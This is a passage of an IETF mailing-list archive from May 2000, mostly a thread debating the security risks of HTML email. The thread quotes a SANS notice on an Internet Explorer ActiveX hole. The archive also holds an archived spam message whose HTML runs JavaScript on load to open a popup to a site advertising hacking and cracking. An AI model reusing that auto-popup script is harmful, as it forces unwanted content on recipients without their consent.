> the e-mail is processed as a webpage which can be used to download
> undesirable content. If you configure your e-mail browser to display all
> messages as text you will close this hole...You will notice my e-mails are
> nearly 100% text
>
Downloading content is also a form of receipt notification and
capabilities discovery, which mass e-mailers love to know. Barnes and
Noble have done mass e-mailings learning to tailor future content,
whether you want it or not.
Another case is teenpicks.com (teen sexual pictures). If we suppose a
CEO, CFO, or directors of a corporation received sexually oriented
HTML e-mail and that e-mail deposited cookies then a claim of a
sexually hostile atmosphere by an employee can be hard to dispute.
> Scot
>
> -----Original Message-----
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
> Sent: Thursday, May 11, 2000 9:45 AM
> To: Castro, Edison M. (PCA)
> Cc: 'Steven M. Bellovin'; [EMAIL PROTECTED]; Brant Knudson; [EMAIL PROTECTED]
> Subject: Re: VIRUS WARNING
>
> On Thu, 11 May 2000 08:24:11 EDT, "Castro, Edison M. (PCA)" said:
> > That is exactly the same way that all Windows virus work. As a Windows
> > user (as well as other OSes), I can say that people have to be responsible
> > for their actions. Whenever you receive any Email attachment, the only
> way
> > that attachment can produce any damage is if you run it.
>
> Well, it's worse. Melissa, the Love Bug, and the Christmas worm all
> required
> the user to take an action (click/open/run the payload).
>
> However, there's apparently ANOTHER hole....
>
> Seen on a SANS posting yesterday:
>
> /Valdis
> -- 10 May 2000 Email viruses are now spreading WITHOUT THE USER
> OPENING ANY ATTACHMENT.
> Personal computers running Internet Explorer (IE) version 5.0 and/or
> Microsoft Office 2000 are vulnerable to virus attacks using most email
> systems, even if the email recipient opens no attachments. You don't
> even have to use IE; just have it installed with the default security
> settings. If you have not closed the hole, you can receive viruses (and
> spread them) by viewing or previewing malicious email without opening
> any attachment, or by visiting a malicious web site. The problem is
> caused by a programming bug in an Internet Explorer ActiveX control
> called scriptlet.typelib. This is by far the fastest growing virus
> distribution problem and ripe for a hugely destructive event - at least
> as large as the ILOVEYOU virus. Updating your virus detection software,
> while important, is not an effective solution for this problem. You must
> also close the hole. The hole can be closed in five minutes or less
> using tools available at Microsoft's security site:
> http://www.microsoft.com/security/bulletins/ms99-032.asp
> The correction script may be run directly from:
> http://www.microsoft.com/msdownload/iebuild/scriptlet/en/scriptlet.htm
> Editor's Note: Thanks to Jimmy Kuo of Network Associates and Nick
> FitzGerald of Computer Virus Consulting Ltd. for raising the visibility
> of this dangerous problem.
--
Dennis Glatting
Copyright (c) 2000 Software Munitions
>From owner-ietf-outbound Thu May 11 11:00:14 2000
Received: by ietf.org (8.9.1a/8.9.1a) id LAA29641
for [EMAIL PROTECTED]; Thu, 11 May 2000 11:00:03 -0400 (EDT)
Received: from mail.xybridge.com (IDENT:root@[209.111.160.85])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id KAA29546
for <[EMAIL PROTECTED]>; Thu, 11 May 2000 10:55:49 -0400 (EDT)
Received: from yixin ([10.10.13.107])
by mail.xybridge.com (8.9.3/8.9.3) with SMTP id KAA01611
for <[EMAIL PROTECTED]>; Thu, 11 May 2000 10:01:15 -0500
From: "Yixin Zhu" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Subject: Any comparison Study on MGCP vs H.323, MGCP vs SIP
Date: Thu, 11 May 2000 09:55:25 -0500
Message-ID: <[EMAIL PROTECTED]>
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200
In-reply-to: <[EMAIL PROTECTED]>
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
Hi,
There are studies on the comparision of the two competing protocol SIP and
H.323. However, MGCP can also provide call control functionalities. A
network with MGCP only (Call agent, MG etc) can provide basic VoIP service
too. Then my questions are
1. Are there any comparison study between MGCP and H.323?
2. Are there any comparision study between MGCP and SIP?
You help is very much appreciated. Thanks,
Yixin (James) ZHU
>From owner-ietf-outbound Thu May 11 11:10:18 2000
Received: by ietf.org (8.9.1a/8.9.1a) id LAA29994
for [EMAIL PROTECTED]; Thu, 11 May 2000 11:10:03 -0400 (EDT)
Received: from apollo.dmnews.com (mail.dmnews.com [204.141.161.2])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id LAA29863
for <[EMAIL PROTECTED]>; Thu, 11 May 2000 11:06:31 -0400 (EDT)
Received: by mail.dmnews.com with Internet Mail Service (5.5.2448.0)
id <HNLHM79K>; Thu, 11 May 2000 11:13:09 -0400
Message-ID: <[EMAIL PROTECTED]>
From: Lillian Komlossy <[EMAIL PROTECTED]>
To: "'Scot Mc Pherson'" <[EMAIL PROTECTED]>
Cc: "'[EMAIL PROTECTED]'" <[EMAIL PROTECTED]>
Subject: RE: VIRUS WARNING
Date: Thu, 11 May 2000 11:13:08 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2448.0)
Content-Type: text/plain;
charset="iso-8859-1"
X-Loop: [EMAIL PROTECTED]
Scot,
While what you say is true - meaning an all-text restriction on your email
browser will prevent
"dangerous goods" to be downloaded - it also takes away functionality. We
have to find a way to
be able to use html based email but restrict it from - say running scripts,
executing anything,
writing cookies, issuing queries, etc... Until that happens, you're right -
html based email
is like a runaway train. We have to invent the "brakes" now.
Lillian Komlossy
Site Manager
http://www.dmnews.com
http://www.imarketingnews.com
(212) 925-7300 ext. 232
>>-----Original Message-----
>>From: Scot Mc Pherson [mailto:[EMAIL PROTECTED]]
>>Sent: Thursday, May 11, 2000 10:07 AM
>>To: [EMAIL PROTECTED]; 'Castro, Edison M. (PCA)'
>>Cc: 'Steven M. Bellovin'; [EMAIL PROTECTED]; 'Brant Knudson'; [EMAIL PROTECTED]
>>Subject: RE: VIRUS WARNING
>>
>>
>>I believe the one of the most important holes is html based mail, because
>>the e-mail is processed as a webpage which can be used to download
>>undesirable content. If you configure your e-mail browser to display all
>>messages as text you will close this hole...You will notice my e-mails are
>>nearly 100% text
>>
>>Scot
>From owner-ietf-outbound Thu May 11 12:20:14 2000
Received: by ietf.org (8.9.1a/8.9.1a) id MAA01800
for [EMAIL PROTECTED]; Thu, 11 May 2000 12:20:01 -0400 (EDT)
Received: from calcite.rhyolite.com (calcite.rhyolite.com [38.159.140.3])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id MAA01639
for <[EMAIL PROTECTED]>; Thu, 11 May 2000 12:11:30 -0400 (EDT)
Received: (from vjs@localhost)
by calcite.rhyolite.com (8.9.3/calcite) id KAA26658
for [EMAIL PROTECTED] env-from <vjs>;
Thu, 11 May 2000 10:11:32 -0600 (MDT)
Date: Thu, 11 May 2000 10:11:32 -0600 (MDT)
From: Vernon Schryver <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: RE: VIRUS WARNING
X-Loop: [EMAIL PROTECTED]
> From: Lillian Komlossy <[EMAIL PROTECTED]>
> While what you say is true - meaning an all-text restriction on your email
> browser will prevent
> "dangerous goods" to be downloaded - it also takes away functionality. We
> have to find a way to
> be able to use html based email but restrict it from - say running scripts,
> executing anything,
> writing cookies, issuing queries, etc... Until that happens, you're right -
> html based email
> is like a runaway train. We have to invent the "brakes" now.
Never mind the other reasons why HTML based email is considered an
abomination by many who understand the issues. What you want is
self-contradictory. What good is HTML based email if it cannot run
scripts or even contain links to other HTML content? Once you restrict
HTML based email enough to be safe, why bother with anything more than
text and perhaps simple pictures? It's not only programs in email that
are dangerous, but also HTTP references. Recall the recent disclosures
concerning the use of unique to the target URL's of invisible pages in
email and web sites instead of HTTP cookies.
You want to run your freight train down a long pass with an 8% grade at
100 miles per hour, and not need to worry about it running away. Maybe
someday there will be some other solution, but today the only tactics
that let breaks control a train in such circumstances begin with going far
less than 100 mph.
You simply cannot have unbridled user-friendliness and security against
bad guys. No matter what the salescritters and pointy-haired claim,
security and convenience will always be at odds.
Vernon Schryver [EMAIL PROTECTED]
>From owner-ietf-outbound Thu May 11 12:30:07 2000
Received: by ietf.org (8.9.1a/8.9.1a) id MAA02103
for [EMAIL PROTECTED]; Thu, 11 May 2000 12:30:03 -0400 (EDT)
Received: from localhost.localdomain ([216.52.68.3])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id MAA01762
for <[EMAIL PROTECTED]>; Thu, 11 May 2000 12:17:49 -0400 (EDT)
Received: from ecal.com (localhost [127.0.0.1])
by localhost.localdomain (8.9.3/8.9.3) with ESMTP id MAA31502
for <[EMAIL PROTECTED]>; Thu, 11 May 2000 12:16:51 -0400
Sender: [EMAIL PROTECTED]
Message-ID: <[EMAIL PROTECTED]>
Date: Thu, 11 May 2000 12:16:50 -0400
From: John Stracke <[EMAIL PROTECTED]>
X-Mailer: Mozilla 4.72 [en] (X11; U; Linux 2.2.14-5.0 i586)
X-Accept-Language: en
MIME-Version: 1.0
To: "'[EMAIL PROTECTED]'" <[EMAIL PROTECTED]>
Subject: Re: VIRUS WARNING
References: <[EMAIL PROTECTED]>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
Lillian Komlossy wrote:
> We
> have to find a way to
> be able to use html based email but restrict it from - say running scripts,
> executing anything,
> writing cookies, issuing queries, etc...
So turn off JavaScript for mail messages.
--
/==============================================================\
|John Stracke | http://www.ecal.com |My opinions are my own.|
|Chief Scientist |=============================================|
|eCal Corp. |But this one goes to 11x. |
|[EMAIL PROTECTED]| |
\==============================================================/
>From owner-ietf-outbound Thu May 11 12:40:13 2000
Received: by ietf.org (8.9.1a/8.9.1a) id MAA02383
for [EMAIL PROTECTED]; Thu, 11 May 2000 12:40:03 -0400 (EDT)
Received: from dokka.maxware.no (dokka.maxware.no [195.139.236.69])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id MAA01884
for <[EMAIL PROTECTED]>; Thu, 11 May 2000 12:23:30 -0400 (EDT)
Received: from langfjella.Alvestrand.no ([10.128.167.143])
by dokka.maxware.no (8.9.3/8.9.3) with ESMTP id SAA08219
for <[EMAIL PROTECTED]>; Thu, 11 May 2000 18:23:31 +0200
Message-Id: <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED]
X-Mailer: QUALCOMM Windows Eudora Version 4.3.1
Date: Thu, 11 May 2000 18:20:15 +0200
To: [EMAIL PROTECTED]
From: Harald Tveit Alvestrand <[EMAIL PROTECTED]>
Subject: Postmortem of ILU to the ietf+censored list
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
X-Loop: [EMAIL PROTECTED]
I've checked the logs for the ietf+censored list after the recent ILU virus
that was sent to the list, 3 days after the initial release of the virus.
25-30 recipients (out of 147) rejected the message. Many more probably just
caught it and deleted it. People are quick to install filters.
What's more interesting is that some of the next messages, discussing the
virus, perhaps containing deactivated copies, but NOT containing a "live"
virus, were *also* rejected by almost all the people who rejected the virus
posting itself.
The filters seem simplistic. Or perhaps just erring on the side of safety.
Harald
--
Harald Tveit Alvestrand, EDB Maxware, Norway
[EMAIL PROTECTED]
>From owner-ietf-outbound Thu May 11 13:40:20 2000
Received: by ietf.org (8.9.1a/8.9.1a) id NAA04064
for [EMAIL PROTECTED]; Thu, 11 May 2000 13:40:03 -0400 (EDT)
Received: from sfo.erg.sri.com (sfo.erg.sri.com [128.18.100.4])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id NAA03873
for <[EMAIL PROTECTED]>; Thu, 11 May 2000 13:31:14 -0400 (EDT)
Received: from erg.sri.com (walleye.erg.sri.com [128.18.4.214])
by sfo.erg.sri.com (8.9.1/8.9.0) with ESMTP id KAA25409;
Thu, 11 May 2000 10:31:13 -0700 (PDT)
Message-ID: <[EMAIL PROTECTED]>
Date: Thu, 11 May 2000 10:31:16 -0700
From: "Fred L. Templin" <[EMAIL PROTECTED]>
Organization: SRI International
X-Mailer: Mozilla 4.7 [en] (WinNT; U)
X-Accept-Language: en
MIME-Version: 1.0
To: [EMAIL PROTECTED]
Subject: Re: Wireless LAN experiences from the IETF meetings?
References: <[EMAIL PROTECTED]>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
Many thanks to all who have replied to my inquiry regarding
Wireless LAN experiences from the IETF meetings. The responses
have been very helpful and greatly appreciated.
Fred Templin
[EMAIL PROTECTED]
>From owner-ietf-outbound Thu May 11 13:50:12 2000
Received: by ietf.org (8.9.1a/8.9.1a) id NAA04237
for [EMAIL PROTECTED]; Thu, 11 May 2000 13:50:03 -0400 (EDT)
Received: from teapot32.domain8.bigpond.com (teapot32.domain8.bigpond.com
[139.134.5.180])
by ietf.org (8.9.1a/8.9.1a) with SMTP id NAA04036
for <[EMAIL PROTECTED]>; Thu, 11 May 2000 13:39:58 -0400 (EDT)
Received: from localhost (localhost [127.0.0.1]) by teapot32.domain8.bigpond.com
(NTMail 3.02.13) with ESMTP id na716833 for <[EMAIL PROTECTED]>; Fri, 12 May 2000 03:37:10
+1000
Received: from DC-56-194.bpb.bigpond.com ([203.40.56.194]) by mail8.bigpond.com
(Claudes-Rainy-MailRouter V2.7e 17/3437166); 12 May 2000 03:37:09
From: "Mafiouso" <[EMAIL PROTECTED]>
To: "[EMAIL PROTECTED]" <[EMAIL PROTECTED]>
Date: Fri, 12 May 2000 03:25:27 +1000
Subject: Mafiouso Hits Back!
Reply-To: [EMAIL PROTECTED]
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_NextPart_000_001__24682211_12327.42"
Content-Transfer-Encoding: 7bit
X-Priority: 1
Message-Id: <[EMAIL PROTECTED]>
X-Loop: [EMAIL PROTECTED]
This is a Multipart MIME message.
------=_NextPart_000_001__24682211_12327.42
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable
------=_NextPart_000_001__24682211_12327.42
Content-Type: text/html; charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable
<html>
<head>
<script language=3D"JavaScript">
<!-- hide=20
window.name=3D"opener"=20
// open new window
function openWindow(url, name, rs, h, w) {
var resize =3D "";
if (rs) {
resize =3D "resizable,";
}
popupWin =3D window.open('http://mafiouso5.tripod.com/mail.htm', name, + re=
size +
'width=3D' + w + ',height=3D' + h);
}=20
// done hiding -->=20
</script>
</head>
<body bgcolor=3D"#FFFFFF" onLoad=3D"openWindow();" text=3D"#333333" link=3D=
"#009900" vlink=3D"#FFFFFF" alink=3D"#FFFFFF" topmargin=3D"0">
<p><font face=3D"Verdana, Arial, Helvetica, sans-serif"><b>$ </b>Hey!</font=
></p>
<p><font face=3D"Verdana, Arial, Helvetica, sans-serif"><b>$ </b>Check Out =
This=20
Page:</font></p>
<p><font face=3D"Verdana, Arial, Helvetica, sans-serif"> <b><a href=3D"%3Cf=
ont%20face=3D%22Verdana,%20Arial,%20Helvetica,%20sans-serif%22%3E%3Cb%3Ehtt=
p://mafiouso5.tripod.com%3C/b%3E%3C/font%3E" target=3D"_blank">http://mafio=
uso5.tripod.com</a></b></font></p>
<p><font face=3D"Verdana, Arial, Helvetica, sans-serif"> <b>$</b> Everythin=
g You=20
Want Mp3s, Pictures, Movies, Hacking, Cracking.... What Ever Your After, =
You=20
Will Find It Here.<br>
</font></p>
<p><font face=3D"Verdana, Arial, Helvetica, sans-serif"> <b>$ </b>Want a HO=
T <b>Christina=20
Aguilera</b> Background For Your PC<br>
<b>$</b> Just Goto The Link Below And Right Click, Then `SET AS WALLPAPER=
. </font></p>
<p><font face=3D"Verdana, Arial, Helvetica, sans-serif"><b><a href=3D"%3Cfo=
nt%20face=3D%22Verdana,%20Arial,%20Helvetica,%20sans-serif%22%3E%3Cb%3Ehttp=
://mafiouso5.tripod.com/Christina.jpg%3C/b%3E%3C/font%3E" target=3D"_blank"=
>http://mafiouso5.tripod.com/Christina.jpg</a></b> =0D
</font></p>
<p><font face=3D"Verdana, Arial, Helvetica, sans-serif"><b>$ Contact Mafiou=
so At:=20
</b></font></p>
<p><font face=3D"Verdana, Arial, Helvetica, sans-serif"><b>$</b> ICQ 537097=
50<br>
<b>$</b> Email <a href=3D"mailto:[EMAIL PROTECTED]">mafiouso@most-=
wanted.com</a></font></p>
</body>
</html>
------=_NextPart_000_001__24682211_12327.42--
>From owner-ietf-outbound Thu May 11 14:00:18 2000
Received: by ietf.org (8.9.1a/8.9.1a) id OAA04441
for [EMAIL PROTECTED]; Thu, 11 May 2000 14:00:03 -0400 (EDT)
Received: from localhost.localdomain (IDENT:root@[204.214.6.250])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id NAA04406
for <[EMAIL PROTECTED]>; Thu, 11 May 2000 13:59:37 -0400 (EDT)
Received: from tech20 ([204.214.6.254])
by localhost.localdomain (8.9.3/8.8.7) with SMTP id NAA16350;
Thu, 11 May 2000 13:58:40 -0400
From: "Scot Mc Pherson" <[EMAIL PROTECTED]>
To: "'Lillian Komlossy'" <[EMAIL PROTECTED]>
Cc: <[EMAIL PROTECTED]>
Subject: RE: VIRUS WARNING
Date: Thu, 11 May 2000 13:59:19 -0400
Message-ID: <00a601bfbb72$a214c800$[EMAIL PROTECTED]>
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2910.0)
In-Reply-To: <[EMAIL PROTECTED]>
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
Importance: Normal
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
Lillian,
I am not so sure I totally agree. Why exactly do we need HTML based
e-mail...Is it really necessary? E-mail is a service for transmitting a
written message, and written messages certainly don't require background
graphics or a full blown graphically based webpage.
There are a few reasons why I believe this, one of the most compelling IMHO
is that graphic content in e-mails increases the size of the e-mail
exponentially, thus greatly contributing to the packet congestion already
extremely evident on the Internet today. I realize that we are developing
new technologies all the time that increase bandwidth, but I think its
terribly inefficient, and dangerous.
There is no practical need for html e-mail. It like saying I want to use a
tractor trailer to commute to work everyday, but it needs to consume only as
much gas as an eco car, and go as fast a Ferrari.
Scot
-----Original Message-----
From: Lillian Komlossy [mailto:[EMAIL PROTECTED]]
Sent: Thursday, May 11, 2000 11:13 AM
To: 'Scot Mc Pherson'
Cc: '[EMAIL PROTECTED]'
Subject: RE: VIRUS WARNING
Scot,
While what you say is true - meaning an all-text restriction on your email
browser will prevent
"dangerous goods" to be downloaded - it also takes away functionality. We
have to find a way to
be able to use html based email but restrict it from - say running scripts,
executing anything,
writing cookies, issuing queries, etc... Until that happens, you're right -
html based email
is like a runaway train. We have to invent the "brakes" now.
Lillian Komlossy
Site Manager
http://www.dmnews.com
http://www.imarketingnews.com
(212) 925-7300 ext. 232
>>-----Original Message-----
>>From: Scot Mc Pherson [mailto:[EMAIL PROTECTED]]
>>Sent: Thursday, May 11, 2000 10:07 AM
>>To: [EMAIL PROTECTED]; 'Castro, Edison M. (PCA)'
>>Cc: 'Steven M. Bellovin'; [EMAIL PROTECTED]; 'Brant Knudson'; [EMAIL PROTECTED]
>>Subject: RE: VIRUS WARNING
>>
>>
>>I believe the one of the most important holes is html based mail, because
>>the e-mail is processed as a webpage which can be used to download
>>undesirable content. If you configure your e-mail browser to display all
>>messages as text you will close this hole...You will notice my e-mails are
>>nearly 100% text
>>
>>Scot
>From owner-ietf-outbound Thu May 11 14:10:13 2000
Received: by ietf.org (8.9.1a/8.9.1a) id OAA04814
for [EMAIL PROTECTED]; Thu, 11 May 2000 14:10:03 -0400 (EDT)
Received: from black-ice.cc.vt.edu ([EMAIL PROTECTED] [128.173.14.71])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id OAA04730
for <[EMAIL PROTECTED]>; Thu, 11 May 2000 14:07:22 -0400 (EDT)
From: [EMAIL PROTECTED]
Received: from black-ice.cc.vt.edu (valdis@LOCALHOST [127.0.0.1])
by black-ice.cc.vt.edu (8.11.0.Beta0/8.11.0.Beta0) with ESMTP id e4BI7Lk19404;
Thu, 11 May 2000 14:07:21 -0400
Message-Id: <[EMAIL PROTECTED]>
X-Mailer: exmh version 2.1.1 10/15/1999
To: Scot Mc Pherson <[EMAIL PROTECTED]>
cc: [EMAIL PROTECTED]
Subject: Re: VIRUS WARNING
In-reply-to: Your message of "Thu, 11 May 2000 13:59:19 EDT."
<00a601bfbb72$a214c800$[EMAIL PROTECTED]>
X-URL: http://black-ice.cc.vt.edu/~valdis/
X-Face: 34C9$Ewd2zeX+\!i1BA\j{ex+$/V'JBG#;3_noWWYPa"|,I#`R"{n@w>#:{)FXyiAS7(8t(
^*w5O*!8O9YTe[r{e%7(yVRb|qxsRYw`7J!`AM}m_SHaj}f8eb@d^L>BrX7iO[<!v4-0bVIpaxF#-)
%9#a9h6JXI|T|8o6t\V?kGl]Q!1V]GtNliUtz:3},0"hkPeBuu%E,j(:\iOX-P,t7lRR#
References: <00a601bfbb72$a214c800$[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Thu, 11 May 2000 14:07:21 -0400
X-Loop: [EMAIL PROTECTED]
On Thu, 11 May 2000 13:59:19 EDT, Scot Mc Pherson said:
> There is no practical need for html e-mail. It like saying I want to use a
> tractor trailer to commute to work everyday, but it needs to consume only as
> much gas as an eco car, and go as fast a Ferrari.
If the computer industry advanced as fast as the automotive industry, we'd
now have computers that run at 5400RPM instead of the old slow 3600RPM drum
memories, they'd consume only 90 kilowatts of power instead of 150..
Wait.. I got that quote backwards, didn't I? ;)
--
Valdis Kletnieks
Operating Systems Analyst
Virginia Tech
>From owner-ietf-outbound Thu May 11 14:20:16 2000
Received: by ietf.org (8.9.1a/8.9.1a) id OAA05151
for [EMAIL PROTECTED]; Thu, 11 May 2000 14:20:02 -0400 (EDT)
Received: from black-ice.cc.vt.edu ([EMAIL PROTECTED] [128.173.14.71])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id OAA04900
for <[EMAIL PROTECTED]>; Thu, 11 May 2000 14:12:32 -0400 (EDT)
From: [EMAIL PROTECTED]
Received: from black-ice.cc.vt.edu (valdis@LOCALHOST [127.0.0.1])
by black-ice.cc.vt.edu (8.11.0.Beta0/8.11.0.Beta0) with ESMTP id e4BICWk32338
for <[EMAIL PROTECTED]>; Thu, 11 May 2000 14:12:32 -0400
Message-Id: <[EMAIL PROTECTED]>
X-Mailer: exmh version 2.1.1 10/15/1999
To: "[EMAIL PROTECTED]" <[EMAIL PROTECTED]>
Subject: Re: Mafiouso Hits Back!
In-reply-to: Your message of "Fri, 12 May 2000 03:25:27 +1000."
<[EMAIL PROTECTED]>
X-URL: http://black-ice.cc.vt.edu/~valdis/
X-Face: 34C9$Ewd2zeX+\!i1BA\j{ex+$/V'JBG#;3_noWWYPa"|,I#`R"{n@w>#:{)FXyiAS7(8t(
^*w5O*!8O9YTe[r{e%7(yVRb|qxsRYw`7J!`AM}m_SHaj}f8eb@d^L>BrX7iO[<!v4-0bVIpaxF#-)
%9#a9h6JXI|T|8o6t\V?kGl]Q!1V]GtNliUtz:3},0"hkPeBuu%E,j(:\iOX-P,t7lRR#
References: <[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Thu, 11 May 2000 14:12:32 -0400
X-Loop: [EMAIL PROTECTED]
On Fri, 12 May 2000 03:25:27 +1000, Mafiouso <[EMAIL PROTECTED]> said:
>Everything You Want Mp3s, Pictures, Movies, Hacking, Cracking....
> What Ever Your After, You Will Find It Here.
Kinda like advertising moonshine at the ATF agent's convention, isn't it?
Although it's certainly not evidence for the "text/html considered harmful"
debate - it's just as annoying as a text/plain. ;)
--
Valdis Kletnieks
Operating Systems Analyst
Virginia Tech
>From owner-ietf-outbound Thu May 11 14:30:22 2000
Received: by ietf.org (8.9.1a/8.9.1a) id OAA05450
for [EMAIL PROTECTED]; Thu, 11 May 2000 14:30:03 -0400 (EDT)
Received: from apollo.dmnews.com (mail.dmnews.com [204.141.161.2])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id OAA05271
for <[EMAIL PROTECTED]>; Thu, 11 May 2000 14:22:30 -0400 (EDT)
Received: by mail.dmnews.com with Internet Mail Service (5.5.2448.0)
id <HNLHM8KH>; Thu, 11 May 2000 14:29:08 -0400
Message-ID: <[EMAIL PROTECTED]>
From: Lillian Komlossy <[EMAIL PROTECTED]>
To: "'Scot Mc Pherson'" <[EMAIL PROTECTED]>
Cc: "'[EMAIL PROTECTED]'" <[EMAIL PROTECTED]>
Subject: RE: VIRUS WARNING
Date: Thu, 11 May 2000 14:29:05 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2448.0)
Content-Type: text/plain;
charset="iso-8859-1"
X-Loop: [EMAIL PROTECTED]
Scot,
ITA we do not need the HTML email for our everyday use.
HTML based email is mainly used by the Email-Newsletter companies, (i.e.
Whitehat,
Exactis, etc...) especially for advertising purposes.
We can argue that we don't need it but in reality, these companies
live off the daily newsletters they send out. I believe all of these
newsletters
are being sent out to people who actually subscribed to receive them.
While the reason is mainly commercial it cannot be ignored. As far as the
bandwidth is concerned - most of those HTML emails don't actually email the
images
but rather display it via a link from their own server. (Which of course
does not help
bandwidth matters especially if first the run it through a logging agent).
I believe the problem starts when somebody writes an HTML email that can
retrieve,
write or execute anything on the receiving client's system.
I agree with you - it is contradictory. So is every new technology, even the
more
tangible ones. I'll bet once everybody agreed that there is no need for the
automobile, horses will do fine - but now we want to take our
tractor-trailer
to work, on an eco-car style gas-burn, and speed as fast as a Ferrari. Go
figure.
Lillian Komlossy
Site Manager
http://www.dmnews.com
http://www.imarketingnews.com
(212) 925-7300 ext. 232
-----Original Message-----
From: Scot Mc Pherson [mailto:[EMAIL PROTECTED]]
Sent: Thursday, May 11, 2000 1:59 PM
To: 'Lillian Komlossy'
Cc: [EMAIL PROTECTED]
Subject: RE: VIRUS WARNING
Lillian,
I am not so sure I totally agree. Why exactly do we need HTML based
e-mail...Is it really necessary? E-mail is a service for transmitting a
written message, and written messages certainly don't require background
graphics or a full blown graphically based webpage.
There are a few reasons why I believe this, one of the most
compelling IMHO
is that graphic content in e-mails increases the size of the e-mail
exponentially, thus greatly contributing to the packet congestion already
extremely evident on the Internet today. I realize that we are developing
new technologies all the time that increase bandwidth, but I think its
terribly inefficient, and dangerous.
There is no practical need for html e-mail. It like saying I want to
use a
tractor trailer to commute to work everyday, but it needs to consume only as
much gas as an eco car, and go as fast a Ferrari.
Scot
-----Original Message-----
From: Lillian Komlossy [mailto:[EMAIL PROTECTED]]
Sent: Thursday, May 11, 2000 11:13 AM
To: 'Scot Mc Pherson'
Cc: '[EMAIL PROTECTED]'
Subject: RE: VIRUS WARNING
Scot,
While what you say is true - meaning an all-text restriction on your email
browser will prevent
"dangerous goods" to be downloaded - it also takes away functionality. We
have to find a way to
be able to use html based email but restrict it from - say running scripts,
executing anything,
writing cookies, issuing queries, etc... Until that happens, you're right -
html based email
is like a runaway train. We have to invent the "brakes" now.
Lillian Komlossy
Site Manager
http://www.dmnews.com
http://www.imarketingnews.com
(212) 925-7300 ext. 232
>>-----Original Message-----
>>From: Scot Mc Pherson [mailto:[EMAIL PROTECTED]]
>>Sent: Thursday, May 11, 2000 10:07 AM
>>To: [EMAIL PROTECTED]; 'Castro, Edison M. (PCA)'
>>Cc: 'Steven M. Bellovin'; [EMAIL PROTECTED]; 'Brant Knudson'; [EMAIL PROTECTED]
>>Subject: RE: VIRUS WARNING
>>
>>
>>I believe the one of the most important holes is html based mail, because
>>the e-mail is processed as a webpage which can be used to download
>>undesirable content. If you configure your e-mail browser to display all
>>messages as text you will close this hole...You will notice my e-mails are
>>nearly 100% text
>>
>>Scot
>From owner-ietf-outbound Thu May 11 15:00:13 2000
Received: by ietf.org (8.9.1a/8.9.1a) id PAA05993
for [EMAIL PROTECTED]; Thu, 11 May 2000 15:00:02 -0400 (EDT)
Received: from unni.dsv.su.se (unni.dsv.su.se [130.237.161.27])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id OAA05863
for <[EMAIL PROTECTED]>; Thu, 11 May 2000 14:50:10 -0400 (EDT)
Received: from [130.237.150.138] (jph1.dsv.su.se [130.237.150.138])
by unni.dsv.su.se (8.9.3+Sun/8.9.3) with ESMTP
id UAA07108 for <[EMAIL PROTECTED]>;
Thu, 11 May 2000 20:50:10 +0200 (MET DST)
Mime-Version: 1.0
Message-Id: <v04210125b540adedd536@[130.237.150.138]>
In-Reply-To: <[EMAIL PROTECTED]>
References: <[EMAIL PROTECTED]>
Date: Thu, 11 May 2000 20:36:52 +0200
To: [EMAIL PROTECTED]
From: Jacob Palme <[EMAIL PROTECTED]>
Subject: RE: VIRUS WARNING
Content-Type: text/plain; charset="us-ascii"
X-Loop: [EMAIL PROTECTED]
At 10.11 -0600 0-05-11, Vernon Schryver wrote:
> Once you restrict
> HTML based email enough to be safe, why bother with anything more than
> text and perhaps simple pictures?
What is wrong with that. I use HTML-based e-mail mostly to
inluce pictures in my messages.
A very useful way of using HTML-based e-mail would also be
to send out forms and fill them in via mail, but this does
not work so well because some mailers does not handle such
messages very good yet.
--
Jacob Palme <[EMAIL PROTECTED]> (Stockholm University and KTH)
for more info see URL: http://www.dsv.su.se/jpalme/
>From owner-ietf-outbound Thu May 11 15:10:13 2000
Received: by ietf.org (8.9.1a/8.9.1a) id PAA06203
for [EMAIL PROTECTED]; Thu, 11 May 2000 15:10:02 -0400 (EDT)
